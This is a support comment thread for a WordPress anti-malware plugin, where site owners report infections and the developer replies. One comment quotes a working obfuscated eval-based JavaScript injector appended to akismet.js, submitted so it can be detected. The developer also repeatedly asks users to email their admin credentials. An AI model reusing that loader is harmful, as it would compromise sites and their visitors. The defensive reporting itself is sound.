Donations keep this Plugin alive! If you value this Plugin I urge you to donate as much as can so that I can keep it up-to-date and make it better. The more money I get, the more time I can devote to it, the more you benefit.
Members
435 Comments on "Members"
Leave a Reply
Get instant updates to new definitions files as new threats are discovered.
*All fields are required and I will NOT share your information with anyone.
*All fields are required and I will NOT share your information with anyone.
I installed your great plugin previously and it was working great. I updated WordPress and now your plug in is not showing up on my dashboard. Also, I tried installing and it says that it the plugin already exists but I am not finding it. Can you please assist?
Does it show on the list of installed plugins? Is it the newest version? When you tried installing it and got the "already exists" error, what was the exact message you got?
If you want me to look at it for you please send me your WP Admin login.
I just installed your plug in but it didn't find any known threats but I do have a real compromised problem here. When I type in my website http://www.octaviaharris.com on sites like facebook or https://bitly.com/ the description and page text display weird text like this:
Isr med assoc j androl mccullough levine return of Levitra Viagra Vs Levitra Viagra Vs symptomatology from a nexus between the serum. Criteria service connection on erectile dysfunctionmen who have Price Of Cialis Price Of Cialis revolutionized the users of ejaculation? They remain the chronicity of diverse medical Cialis Cialis and minor pill communications.
It just started happening yesterday. Can your plug in help resolve my issue?
Thanks
It should be able to find this threat. If you have downloaded the latest definition update and it still does not find any known threats on a Complete Scan then you can send me your WP Admin login and I will find it for you and add it to my definition update so that it can be automatically detected and removed.
Hello,
My WP site was compromised. I went ahead removed php files via FTP that the plugin found. Would you please check things out to be make sure sure that all is well now.
Thanking you in advance!
It looks alright from the outside. What was the file that you deleted?
If you have any reason to think you might still be infected and you want me to check it out from the inside I'll need your WP Admin login.
Hello,
I am having recurring issues with backdoor scripts? Can you please help me resolve this issue?
Send me your WP Admin login and I'll take a look. You can email the info directly to me: eli AT gotmls DOT net
Thanks for this AMAZING plugin
I have tried everything to reface my website
crescentcarco.com
replaced every file, except the uploads folder *checked it manually*
now my subpages work fine but my main page still redirects.
can you PLEASE take a look at it, I will be obliged
Thanks for sending me access credentials to your site and your server.
Got the home page fixed!
It turns out there was a text widget that was injected into your database. I'm not sure how the hacker did that, probably a database vulnerability at the hosting level, but it was easy to remove.
Please let me know if there is anything else I can do for you.
Dude you seriously ROCK
i also saw the entry of the text widget in the database, it looked suspicious and made no sense at all, but i was afraid to mess up the DB.
Once again thanks man, I really appreciate your help
Any advise on securing my site permanently, it gets defaced often.
Thanks
Numair
Thanks.
Protecting your site from future hacks is difficult because there are just so many ways that hacker will try to get in. In your case, because of the way the DB was hacked I would suggest moving to a more secure hosting environment. Cheap shared hosting is just so vulnerable to cross-site contamination, control panel breaches, and root server hacks.
I now offer very secure hosting for those that are getting too much attention from hackers and need a safer place to host their site. It's $12/month per site and there is no control panel. Let me know if you are interested.
Eli,
Thank you for the wonderful work you're doing and for this great plugin.
Three of my WP sites were hacked last week and the hacker's page and music (from Philipines) were inserted on my homepage. After a couple of days, Hostgator fixed it for me and warn me to always updates my plugins and themes.
Today, the same hacker did his thing again, only it has affected more of my sites.
Thus, I downloaded your plugin and after scanning one site, it identified 4 potential viruses. Below is one of them.
Do you think this is the virus. I can give you admin access if that will help.
Thanks!
cap->create_posts ) )
wp_die( __( 'Cheatin' uh?' ) );
/**
* Press It form handler.
Thanks for sending me your WP Admin login credential. I downloaded my definition updates and ran a Complete Scan on your site. Those potential threats are all ok. It looks like your site was defaced by a hacker using a vulnerability of your server or another compromised site on your shared host. There may be nothing you can do to stop an attack like this other than moving all your sites of that server.
The good news is that the damage is minimal and very easy to fix. The hacker has planted a file called index.html in the root directory of each infected site. WordPress uses a file called index.php so index.html is not needed and should be deleted. You can use your host's file manager or any FTP client to delete these infected index.html files easily. I have also updated the scan range of my plugin on your server to scan the whole public_html directory and all the sites in it. If all else fails you can use me plugin to find and delete these infected files, it will take a really long time to run a Complete Scan on all those site but the option is now there if you need it.
Let me know if you need any more help.
Aloha, Eli
Thanks, Eli.
I'll do as you advised.
I've got some malicious virus on the website and ran your plugin which found 18 potential threats. A lot of index.php in different folders that just have one single script in each file (?). But i really dont know how to do now. How do I get rid of this malicious virus? Can you please go into the website and fix this? Would of course make a donation if the virus gets away.
Thanks,
Limp
Can you please email me with the WP Admin login for your site?
My direct email is: eli at gotmls dot net
hi i have the same issue please help
Have you registered my plugin and downloaded the latest definition updates?
If you have done this and my plugin still does not find any known threats then this could be a new type of infection that needs to be added to my definition update. As I told Limp Salas, if you send me your WP Admin login I will find it for you and add it to my definitions so that it can be automatically removed.
Hi
First of i must say awesome plugin but thing is that i am facing daily wordpress post attack like
and something suspecious
these kind of attack .
Do you have any plugin that solves these kind of issue on posts ??
Thanks
It sounds like this could be an SQL injection. You should try changing the login credentials to your DB. If the attacks continue at regular intervals check the log files at the time of the attack to see if you can spot the script file responsible for the injection.
Something has infected all of my plugins on different sites. I am trying to run your plugin (which I resintalled) and I am getting the message
"Another Plugin or Theme is using 'eva1fY2bak1cV2ir' to hadle output buffers.
This prevents actively outputing the buffer on-the-fly and will severely degrade the performance of this (and many other) Plugins.
Consider disabling caching and compression plugins (at least during the scanning process)."
I don't have any plugins running (as a result of the virus), so I can't figure out how to fix the issue with the output buffers. Any ideas? Right now it has checked 25 folders in 18 minutes with 4,407 folders left to go.
eva1fY2bak1cV2ir sound like a malicious function that was hacked into your site to inject redirects or ads into the output of your pages. It is probably embedded in your theme or one one of the core WordPress files. It may also be encoded so that you cannot easily search for it or tell what it's doing with your output.
It's obviously affecting the speed of you site if it's taking that long to scan. If my plugin does not find it when the scan finally finishes then you can send me your WP Admin login and I'll look for it for you.
You misspelled "handle":
Another Plugin or Theme is using 'eva1fY2bak1cV2ir' to hadle output buffers.
Thanks for pointing that out. That message has been misspelled this whole time and I didn't notice and nobody else has said anything until now. I'll have it corrected in my next release.
Hey Eli,
I noticed that all my sites I have your plugin installed on got a message alert that the wp-content/plugins/gotmls/safe-load.php file was changed. Did you do this or are the hackers trying to defeat your plugin?
Thanks…
That was me. I did upload a change to that file but did not release a new version so it shows up different.
Hello Eli
I am learning how to be a web master and have had to deal with these malware problems more and more lately. I love your anti malware program. Can I get you to look at our site and help me make sure there are no problems. This is a school website and I need to make sure the community can access this website safely.
my site http://www.cic-caracas.org is infected by malware. i have scanned using this plugin and confirmed and said it took care of some of the treats but listed 68 potential threats. What can I do about all of those. Please tell me how to remove all those or if it is necessary.
Thanks.
I would be happy to check your site for you. Can you send me you WP Admin login?
You can email the password info directly to: eli at gotmls dot net
Thanks for sending me the login. I did find one more threat in the footer, added it to the definition update, and removed the malicious code from that file.
Your site should be all clean now. You just need to go to your Google Webmaster Tools account and request a review in the Malware section to get rid of that warning from Google.
Please let me know if you need anything else.
Hi Eli,
Thank you for this great plugin! It fixed a lot of crap having entered my site, but yeasterday I got a new one. All plugins disapeared, but still in the plugin directory. I removed everything to try to re-install, had a hunch so started with Anti-Malware to run a scan and it reported:
"Another Plugin or Theme is using 'eva1fY2bak1cV2ir' to hadle output buffers.
This prevents actively outputing the buffer on-the-fly and will severely degrade the performance of this (and many other) Plugins.
Consider disabling caching and compression plugins (at least during the scanning process).
What is this "eva1fY2bak1cV2ir" – and how to get rid of it??
Br,
Stein
eva1fY2bak1cV2ir is a custom function that has taken over the output buffer on your site. I cannot say exactly what it does without seeing it, but I would guess it is filtering the content of you site to display only what the hacker wants to display (or it inserts content that the hacker wants to add to your site).
If you want to give me access to your site I will see if I can find it for you.
Thanks a thousand Eli – new donation is done.
Thank you!
Please let me know if I can be of any further assistance.
Thanks so much for the great plugin. I have an issue with some Malware on our site. Sucuri says it found Malware, but your plugin and Wordfence both say the site it clean. However, both computers I accessed the site with ended up getting infected with the "system-care antivirus" malware, so I suspect this is what Sucuri is picking up. I am not sure what my next step should be or where to look in my files for suspicious code. Any suggestions would be greatly appreciated.
Thanks again,
Vicki
If you have my latest definition update and you are scanning your whole site and it's not finding anything then you may have a new virus that I have not yet identified. These threats are alway evolving and adapting to avoid detection. Would you be willing to provide me with WP Admin access to your site? Then I can find it and update my definitions update so that it can be automatically repaired by my plugin.
Error message disappeared … seems that everything is OK afterall. Thanks!
Damir
Sometimes it take a little while for Google to review your site and notice that it has been cleaned. For future reference, you can speed that process up by requesting a review in the Health section of Google's Webmaster Tools.
The plugin detect a normal code and say : Found 1 WP-Login Exploit
<?php
/**
* WordPress User Page
*
* Handles authentication, registering, resetting passwords, forgot password,
* and other user handling.
*
* @package WordPress
*/
/** Make sure that the WordPress bootstrap has run before continuing. */
require( dirname(__FILE__) . '/wp-load.php' );
———
is that a bug?
thanks
Thanks for asking this question. No, it is not a but?
It is, as you say, normal code.
It is the essentially the first line of code in every wp-login.php in every install of WordPress.
It is also extremely vulnerable to a brute-force attack.
Basically, if that wp-load.php file is included without certain protection, it can bring down your whole server. My plugin now has a patch for this file that stops the WordPress bootstrap from loading if it senses a brute-force attack. This was inspired by the wide-spread brute-force attacks that have been targeting WordPress login pages around the world for the past few weeks. These attacks have crippled servers and probably succeeded in stealing some passwords too. So my plugin looks for the absence of my patch and , if not found, classifies this file as Exploitable. Select this file to be fixed will automatically apply my patch, in much the same way as it patches older versions of timthumb.php that can be exploited to write malicious code to files on your server.
I hope this suitably explains why it is highlighting this "normal" part of any WordPress installation. Please feel free to contact me again, should you need any further explanation or assistance.
That explains why I thought this was coming up with a false positive. I see where some people were having issues logging back in after applying the fix. Is that fixed now? I don't want to apply the patch and then not be able to log back in.
Also, I have a couple of files that are written with an eval Base_64 statement in them. I sent the potential virus file to the creator of the plugin and asked if the code (machine code I couldn't decode) was legitimate. They said it was legit.
My question is how do we mark a file as not a virus after using your plugin?
Thanks again Eli for everything.
There were a few people who had a problem logging in after applying the first version of this login patch. This was because there servers had register_globals turned on and WordPress destroys session vars whenever register_globals is on. I have fixed this in the current patch and it works great at stopping these brute-force attacks.
If you have any false positives that come up because a plugin developer is trying to be sneaky or cryptic like a hacker then I can whitelist that code but only after I decrypt it and check it thoroughly to make sure it is really ok.
Great job Eli. The login script cleanse works great. Tried it on a test domain and no problems at all.
Thanks so much.
I'll get you the info on those false positives. I do have a couple of coders who like to hide what they did so most people don't steal their ideas and processes.
Roger
Hi Eli. I love your plug-in! But I just upgraded to 1.3.04.17 and even though the site is registered I am getting an error message on 'What to look for':
WP-Login Exploits
Registration of your Installation Key is required for this feature
but your Scan Setting Page also tells me:
Your Installation Key is Registered:
8d8f06a5f8d73d9a59ad6f993de2fac1
http://308gts.dorman-consulting.com
Your Definitions file is current.
Is this normal?
Jeff
I'm sorry you got conflicting information on that page. I had to disable that particular update because it was causing problems on some peoples sites. I have just released a plugin update that reolves this issue. If you download the new version 1.3.04.19 then it should work correctly.
Please let me know if you still have any issues, Thanks.
Hello Eli, Just downloaded and ran your plug-in. It did find some malware and repaired on my site. Problem Is I still have an issue with my site Google is calling malware and has posted a warning. I would like to give you more info if you could look
Thanks
This is a common problem for people, after removing the malware you need to have Google review your site. There is a Malware page in the Health section of Google Webmaster tools where you can request a review.
let me know if you need any more help.
Hello,
Malware has completely messed up the appearance of my blog. I don't have a current backup so I'm trying desperately to restore my site without completely wiping it. I've run several scans from various sources and they all show different results. I've heard good things about your plugin so I'd love to use it but it shows no threats (but skipped about 1100 files). Am I out of luck or am I doing something wrong?
Your not out of luck because you just contacted the right person. You probably just have some new malware variant that I have not written a definition for yet. If you send me your WP Admin login I will get in there and find it for you, and add it to my definition update so that it can be automatically repaired.
Thanks for sending me your login info, and for the tip about the analytics plugin. I found the Malicious code embeded in the main plugin file of the Google-Analyticator Plugin. I have added this new threat to my definitions update and repaired that files with my plugin. You can enable that Google-Analyticator Plugin again if you want to still use it.
I just stopped by to make my monthly donation.
Eli, keep up the good work, you're a godsend.
Mahalo
Jeff
Hi Eli,
Great plugin.
Can you please help me out? My site is infected with malware.
I have a Malware entry: MW:EXPLOITKIT:BLACKHOLE1. Can your plugin fix this entry?
I already scanned and 5 threads where found. However, http://sitecheck.sucuri.net/results/vonkatwork.nl still shows that my site is infected.
Thanks!
Sucuri shows you are clean now.
If you still need more help with anything send me your WP Admin login.
I got the same problem I installed the plug in and runed the scan but nothing has changed, I am still have the same problem. Here is what my antivirus warnig is telling me:
URL:
http://movinghouston.com/wp/buy_sell/
Process:
C:Program Files (x86)GoogleChromeApp…
Infection:
JS:Iframe-AMW [Trj]
Thanks for providing a login to your admin. I added that new threat to my definitions update and then my plugin was able to remove it form the two files that were infected.
I also expaneded the search range to include the root site and it found and clean two backdoor scripts that were probably responible for planting the virus in the first place.
You site is all clean now. Let me know if there is anything else you need.
Hi
I have a site bluemonkeyonline.net that is infected with malware which appears to come from bizwonk.com, as every time I load bluemonkeyonline.net, bizwonk.com appears in the lower left of the browser window. I have scanned and infected files have been located and quarantined and a number of potential threats have been found, but the site is still infected as on reload the domain bizwonk still apears. Am I doing something wrong.
Cheers….michael
It sounds like you have an iframe injection that is not being detected by me plugin. If you want to give me WP Admin accesss to you site I can find it and add it to my definitions so it can be automatically removed.
Hi Eli!
I really need help… I'm one of several administrators for this site: http://www.bryggerietsgymnasium.se. It's been blacklisted for a week so I decided to spend my weekend trying to solve the problems. Without success. I have installed Anti-Malware and another malware plugin and done a check with Sucuri, and I get different results everywhere. Sucuri results are that it doesn't show any problems but still have been blacklisted by Yandex. I have updated wordpress and all plugins. Anti-Malware results refer mostly to script files (23), both in wordpress and plugins (among them the other malware plugin!). I have been able to half the problems by removing a lot of old posts but it's more tricky when it comes to pages. The other malware plugin finds problems everywhere…. Now I'm a bit desperate. Can you please help?
Thank you//Eva
I would be happy to take a look at it if you can send me a login to your WP Admin.
I have trouble that Avast software find malware and block my site. I've tried almost 10 different check up software and sites that do that to find something. but doesn't find anything. Is Avast just being stupid with my site or?
This is the second comment within a half hour that reports of such a problem with Avast!
I do not see any signs of infection on either site. So, this is either a very new/undetected virus that Avast has found, or something on both sites is giving off false positives to Avast.
If there is something new that has infected your site then it is certainly possible that my plugin (as well as others') has in fact missed it.
If you can come up with any details about this infection that might help me identify it I would be happy to take a closer look.
Hi, a visitor of my site discovered that his Avast! flagged it as containing malware. This plugin doesnt recognize any threats when I scanned through the files. Should I not worry or might there be something that this plugin cannot find?
Your's is one of two comments within a half hour of each other that highlight such a report about Avast!
I do not see any signs of infection on either site. So, this is either a very new/undetected virus that Avast has found, or something on both sites is giving off false positives to Avast.
If there is something new that has infected your site then it is certainly possible that my plugin (as well as others') has in fact missed it.
If you can come up with any details about this infection that might help me identify it I would be happy to take a closer look.
I just registered the first domain and wanted to run a scan to see if it does as advertised. if it does, I too want to be able to protect all my domains under two email addresses. I have one for my personal use and one that is a reseller account I put my clients sites in.
Cheers,
That sounds like a good plan. Do you have any infected site you are trying to get clean?
Let me know if I can be of any assistance.
So far I have used the scanner on three of my sites. Each time they found 2 known threats. When I clicked auto fix, it would fix one of the files, but not the other. What should I do next. Can I actually delete that file from the directory or no? Thanks for your help.
I would not delete the file unless you are sure it is not needed for your site to function. Usually these types of infections are just one line of malicious code that is injected into a core file that your site was already using and deleting that file will break your site. The trick is to remove the malicious code while preserving the integrity of the rest of the file. That said, there are sometime files that are all bad and no good and not needed at all which you can delete but knowing the difference if the key. If my plugin cannot remove that second threat then it is probably due to the permissions on that file.
If you want I can take a look at and fix it for you and give you more info. You can send login credentials directly to my email if you want me to check it out: eli at gotmls dot net
I was pretty psyched to discover your plug-in, installed it, started to run it when it appeared to get hung up. I logged out and now I have this error:
Fatal error: Unknown: Failed opening required '/data/26/2/24/8/2513008/user/2752766/cgi-bin/.php/sessions/sess_d46e1d1d9b1761f304069089014695a6' (include_path='.:/usr/services/vux/lib/php') in Unknown on line 0
I am very sad.
I just wanted to follow up from last week, and say thank for providing the WP Admin and FTP logins I needed to get you issue resolved.
How has your site running? It looks like it has stayed clean but I see it is still blacklisted on Google. You need to go to Google's Webmaster tools and request a review to clear that warning. Let me know if you need help with that.
Also, it looks like there are still vulnerable timthumb.php files in the themes of two other sites on your server. These are not viruses but they are still exploitable and could lead to another infection. My plugin can scan all the sites on your server at once and automatically upgrade those timthumb files to patch that vulnerability.
Please let me know if can be of any further assistance.
Great product – just made a donation. Do you have any simple suggestions for new WordPress blogs to prevent malware, etc. I read somewhere to change categories and to make difficult passwords but I couldn't find the article again.
There is no golden solution to this general problem, but usually keeping WordPress up-to-date and making sure the theme and plugins you are using do not have any known vulnerabilities is a good start. It is also a good idea to run regular scans for mal-ware. I am working on a cron engine for scheduling automatic scan which will help with that.
I have never hear anything about changing categories but it couldn't hurt to have strong passwords (but these kinds of hacks usually don't need to use your password to get in).
Thanks for your donation. The more support I get, the more I can support this plugin and make it better and stronger against a wider variety of threats and vulnerabilities.
Hi Eli,
Awesome plugin and keep the good work. Anyway, any chance to prevent the logo displayed in the menu links, I mean just like another plugins
. Thanks again.
I think you are asking if it is possible to not show the Anti-Malware menu item.
If so you may want to look on the bottom-right of the Scan Settings page and change the "Menu Item Placement Options" setting to "Sub-Menu inside the Tools Menu Item".
If that is not what you are looking for then please try me again and I'll see what I can do to help.
I will definitely look forward to donation, if you really helped me out. As i wasted my money into SiteLock service, i have requested the refund after getting it i will donate the same amount to you…
Please help me ASAP.
I can help you now but I will need you WP Admin login to scan for this threat. When I find it I will add it to the definition update and it can then be removed automatially. Please send login credentials to eli at gotmls dot net or reply to this notification.
Hello, I just downloaded your plugin and my website mobile version seems to be redirecting to a russian model website. Can your plug in fix this malware problem? We are more then happy to donate if it can.
It should find it and mark it as a Known Threat at which point you can click Automatically Repair to fix it.
If it does not find it, or it only find Potential Threats, then I can help you locate the source of the infection and write a new definition so that it can be automatically removed.
Please let me know if you need further help. You email your WP Admin credentials to eli at gotmls dot net if you want my direct help.
Is it possible to register more than one site, or do I need to create a different user profile for each site I'd like to scan?
If you use the same email address when registering the other sites then they will all fall under the same registration. If you have already registered some under other email addresses you can login to those accounts and transfer those domains you have already registered to your preferred email account.
Excellent. Thank you.
Hi Eli,
I ran a scan with your plugin, it found 2 security vulnerabilities in htaccess. Clicked repair, and then got 500 internal server error… now my site is down, can you help?
It looks like sucuri already removed some injected code from those htaccess files. My plugin had found some remaining code left in pieces in those files and when it tried to remove the last few pieces of code it broke the file. This would not have happened if my plugin had scanned these htaccess files before sucuri modified them (when the whole malicious redirect code was intact) or if sucuri had removed all the injected code when they cleaned the file, but at least we know how it happened and I can try to accommodate this sort of thing in the future.
Thanks for giving me the chance to look at it all on your server. Please feel free to contact me if you need more help.
Hey Eli,
Great plugin, I am impressed so far at it finding some malicious scripts, but it reports this one as a potential threat, when I am pretty sure it is a threat
Basically everything from "var _0x4470=" onwards has been appended by a hacker/ malicious script.
Thanks
[script akismet.js]
jQuery(document).ready(function () {
jQuery('.akismet-status').each(function () {
var thisId = jQuery(this).attr('commentid');
jQuery(this).prependTo('#comment-' + thisId + ' .column-comment div:first-child');
});
jQuery('.akismet-user-comment-count').each(function () {
var thisId = jQuery(this).attr('commentid');
jQuery(this).insertAfter('#comment-' + thisId + ' .author strong:first').show();
});
});
var _0x4470=["x39x3Dx31x2Ex64x28x27x35x27x29x3Bx62x28x21x39x29x7Bx38x3Dx31x2Ex6Ax3Bx34x3Dx36x28x31x2Ex69x29x3Bx37x3Dx36x28x67x2Ex6Bx29x3Bx61x20x32x3Dx31x2Ex65x28x27x63x27x29x3Bx32x2Ex66x3Dx27x35x27x3Bx32x2Ex68x3Dx27x77x3Ax2Fx2Fx74x2Ex75x2Ex6Cx2Ex76x2Fx73x2Ex72x3Fx71x3Dx27x2Bx34x2Bx27x26x6Dx3Dx27x2Bx38x2Bx27x26x6Ex3Dx27x2Bx37x3Bx61x20x33x3Dx31x2Ex6Fx28x27x33x27x29x5Bx30x5Dx3Bx33x2Ex70x28x32x29x7D","x7C","x73x70x6Cx69x74","x7Cx64x6Fx63x75x6Dx65x6Ex74x7Cx6Ax73x7Cx68x65x61x64x7Cx68x67x68x6Ax68x6Ax68x6Ax67x7Cx64x67x6Cx6Cx68x67x75x6Bx7Cx65x73x63x61x70x65x7Cx75x67x6Bx6Bx6Ax6Bx6Ax7Cx68x67x68x6Ax67x68x6Ax68x6Ax67x6Ax68x7Cx65x6Cx65x6Dx65x6Ex74x7Cx76x61x72x7Cx69x66x7Cx73x63x72x69x70x74x7Cx67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64x7Cx63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74x7Cx69x64x7Cx6Ex61x76x69x67x61x74x6Fx72x7Cx73x72x63x7Cx72x65x66x65x72x72x65x72x7Cx6Cx6Fx63x61x74x69x6Fx6Ex7Cx75x73x65x72x41x67x65x6Ex74x7Cx32x31x36x7Cx6Cx63x7Cx75x61x7Cx67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65x7Cx61x70x70x65x6Ex64x43x68x69x6Cx64x7Cx72x65x66x7Cx70x68x70x7Cx7Cx39x31x7Cx31x39x36x7Cx36x34x7Cx68x74x74x70","x72x65x70x6Cx61x63x65","","x5Cx77x2B","x5Cx62","x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3–){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3–){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));
Thanks for reporting this. I does indeed look malicious. I will define it now and add it as a Known Threat so that it may be automatically repaired.
I just updated the definitions. Can you do the download the update and scan it again? It should now mark this threat as "Known" and give you the option to "Automatically Repair".
Please let me know how it works for you. Thanks!
Hey Eli,
Thanks for the reply, and diligently adding to the definitions.
I have removed these manually, so haven't been able to successfully get them to be removed with the scanner yet, but hopefully I will soon… well hopefully not actually, but you know what I mean.
I was thinking it would be good to be able to submit potential threat files to the definition too, so that jw player for example (a common plugin) isn't caught everytime as it has an eval() in it…. that is apparently legit…?
I would be happy to submit my scripts to you from plugins… or just the links to plugins with eval() in their scripts, and you could then get the original for your definition and compare?
Thanks again.
C
Thanks. I understand. I have not had the time I need to go through and exempt all the legit uses of eval and the like. I do have a method for white-listing benign code that would otherwise come up as a potential threat but it will take some time for me to go through and list all the exceptions properly without allowing loopholes for the malicious code.
I've registered and donated to your site but can no longer login to my wordpress admin page.
When I tried to update the definitions from the wordpress plugin section nothing happened (the rest of the registration section was in green).
Can you help please?
I would be happy to help. If you want to give me your WP Admin credentials I can login and try it.
I am sorry I havenot made any donation yet. I just started trying the service you give. I have a problem that I can not solve yet. There is "Found the document has moved here" note on the top left corner of my blog page. I think this is a malware or a kind of virus. I try to scan all the plugins, wp content and html but this software plugin seems does not workl
Please help me this malware is very disturbing and dangerous for my web blog and my computer.
I am looking forward to your support and help. Please…
Best regards
I'm willing to help you find this bug if you can give me your WP Admin credentials.
did you ever find this problem? I have it too
Heru never responded to me. If you are willing to give me access to you WP Admin then I will track this down for you, and add it to my definitions so that it can be automatically removed.
I found the problem. If you are logged into WordPress go to Appearance>Editor> on the right hand side click on "Theme Functions" (functions.php) > "click ctrl f" on your keyboard to bring up the search tab on the upper right hand side of your panel > search for smuss.net (or whatever website the "here" link brings you too.) I'm talking about the "here" link that we are trying to get rid of on our pages> The search will bring you to a URL. Mine brought me to "http://smuss.net/jquery-1.6.3.min.js" > delete the entire URL between the "" but leave the "" and update the page. Then the problem will be fixed.
If you are not logged into wordpress extract your theme in a folder > open the theme folder > right click on functions.php > open file with notepad > scroll to the bottom of the page > look about 15 lines up for the URL and delete it > click "save" under "file" in the menu > close the notepad. Then the problem will be fixed. If you do not see the URL near the bottom (aprox 15 lines up) then you will have to search for it in this file and delete it.
This took me awhile today to track down and fix so I hope this helps someone else other than me
I just downloaded and installed the plugin. Sucuri.net scans have revealed multiple malware threats whereas the MLS plugin does not seem to find these threats. Also, when I run a scan on the publc_html, the scan seems to be running for several minutes and then it just stops. All the while, the percent complete indicator remains at zero. Any idea what might be happening?
Thanks for providing WP Admin credentials to your site. I was able to figure out why is was not finishing the scan. First, it looks like you've got 20+ domains installed under the main site's public_html directory, so the Quick Scan is not an viable option. Second, you have at least one symbolic link to the public_html directory inside the public_html directory, this causes infinite recursion when drilling down through the directory structure (in order to understand recursion you must first understand recursion)
I have added the public_html directory to the exclude path so that it will not be followed a second time through. I also add the wp-snapshots directory to the exclude path just to save time. It will now scan over 5,500 folders including all those other domains but it will take some time to do a Complete Scan.
Eli is AMAZING.
I reached out to him with a malware problem on one of my sites and an hour later he was in it searching for the culprit. 30 minutes later problem solved and a plugin update on the way.
Where do you get this kind of customer service for a free plugin? As I said AMAZING!
Eli you have a fan, a friend and a donor for life.
Mahalo
Jeff
I want to skip some files, but I can't edit 'Skip files with the following extentions'. If I remove the standardextentions 'png,jpg,jpeg,gif,bmp,tif,tiff,exe,zip,pdf' the plugin still scans these extentions. Please help.
You will want to skip any binary files as they are generally larger then ascii files and do not contain any scripts. I had designed it so that you could not completely clear this field, assuming that you would always need to exclude something. I have, however, fixed it so that you can now clear this field and scan all files. Keep in mind it will likely be a waste of time to scan binary files for malicious text patterns.
Hi there
my site crashed twice now during the scan-<i still have 2 alerts.What could be the cause. Before I deactivate the plugin I would like know what you suggest
Silgin
These 2 "Alerts" you are talking about are from Sucuri.net and they are cached from 2 days ago. I just had Sucuri refresh their cache by clicking "Re-Scan" on their site and the results confirmed that your site is now clean.
i got something like this
"Warning: set_time_limit() has been disabled for security reasons in…"
What should i do? Is this a problem or just an unimportant info?
Thanks
It's not something to worry about. I am setting the timeout to 60 seconds in a recursive loop so that it does not get stock in some part of that scan process. Your server's security settings seem to be stopping me from setting that value.
I will suppress this error in my next release by changing set_time_limit to @set_time_limit. You can add the @ to your version if you want to suppress these errors now.
The plugin says my number is not registered, but your site says it is. I've logged on with the password you supplied. I've reloaded the plugin page, but no change.
Lane
Somehow your site was registered in my database without a trailing '/' (slash). I have corrected this error in my database so it should work for you now.
Thanks for contacting me about this issue. Please let me know if there is anything else I can do.
Thanks, that seems to have fixed it. It doesn't say I'm registered, but at least it no longer says I'm not!
The search for updates, plugin and definitions is taking forever, but maybe your server is overloaded.
I did a scan of plugins, and out of 1131 files, it found 59 potentials in 9 different plugins. These are plugins I've used for a long time.
It should say "Your Installation Key is Registered" in green letters in the Definition Updates section on the right. It should also say "Your Definitions file is current" below that. You want to make sure that you have downloaded the latest definitions. Then you want to scan your whole site (not just the plugins directory).
I wouldn't worry about those "Potential Threats" in Yellow, it's just the ones in Red you should repair.
Yes, when the definition update finished, it did display the above.
Unfortunately, when I did a wp-content scan, it listed a bunch of files from one plugin in red. This is a very valuable auto-blogging plugin, and I wouldn't want to do anything to harm it unnecessarily. What does repairing involve?
Trying to do a public_html scan, I got this error: Fatal error: Maximum execution time of 30 seconds exceeded in /home/thewebdr/public_html/wp-content/plugins/gotmls/index.php on line 82
I had seen that in the wp-content scan, and I added to a php.ini in public_html:
max_execution_time = 600
I don't know why it's not taking effect.
My plugin was designed to remove the threat from an infected file without breaking the file. Admittedly it's not always 100% effective and I have had a couple of False Positives in the past. So, make a backup of the plugin and then run the Automatic Repair and see what happens. There is also a link to revert the changes if it dies break something.
There are also two lines in a recursive loop within plugins/gotmls/images.php (lines 244 and 276) where you would need to change
set_time_limit(30);
to a higher number.
I Have found 6 potential threats what's next?
see my FAQs:
http://gotmls.net/faqs/
Hi,
just donated and didn't write the sites name. Is it registered some how anyway?
Thanks!
Yes. Donating from your WP-Admin will pass along your Installation Key for my plugin. I see that your donation is associated with your site name.
Hi
my site http://www.tradeexpressions.com.sg is infected by malware. i have scanned using this plugin and confirmed. Please tell me how to remove all those.
Thanks
Selvan
If my plugin finds "Know Threats" (in red) you should see a button that says "Repair SELECTED files Now".
If all you are finding is "Potential Threats" (in yellow) then please send me a screenshot and I'll see if anything stick out at me as suspicious.
Once again your great plugin spotted malware on several of my sites and then removed it. I'm just waiting to see if it sneeks back in again but meanwhile although I've already made a modest donation I've decided to make another one each time another infection is spotted.
Cheers and keep up the good work.
Regards
Will Chapman
Thanks the donating again, I like that philosophy.
Let me know it they come back and I can take a look (maybe figure out how they got in).
Hi, I love the plugin, but I run multiple sites, and it's not letting me use the plugin on site 2 with the same email address I used for site 1. Is there a developer's package, or some way to do this? I use the same admin email for all of the sites. I did donate! Thanks!
I am working on supporting multiple domains registered under one email account. As a test I have manually registered another one of your domains under the same account you already have (the one I added is the same one you use as your email address). If you install my GOTMLS Plugin on that domain you should see that it is already registered. You should also see that it has the ability to scan one level higher in your directory hierarchy. Hopefully this will enable you to scan all your domains on that server from one WP Admin. Please let me know if this works for you as desired or if you have any problems.
I've the sme problem. I manage 40 no profit plogs and I would like to protect all with your plugin but seems only one could be registered with an email adress. a Pity!
I have changed the registration process on gotmls.net to accept multiple site/key registrations under a single email address. Give it a try and let me know how it works for you.
I'm having a problem here too. I currently have two sites registered with gotmls.net (and I've donated!). But I can't figure out how to add another site. There's no way to do it after you've logged in.
Can you help?
The best way to register any site is to install the plugin on that site and then use the built-in registration for on the Anti-Malware Settings page in the WP-Admin of the site you want to register. If you use the same email address on the form as you did on the registration for your other sites then all your site will be registered under the same account. If you already registered the new site under a different email then you can login to that account on gotmls.net and transfer that site's registration to your other account so that they are all together.
Hi Eli:
I just downloaded your latest version 1.2.04.04 and the following two warnings are on the dashboard for the plugin:
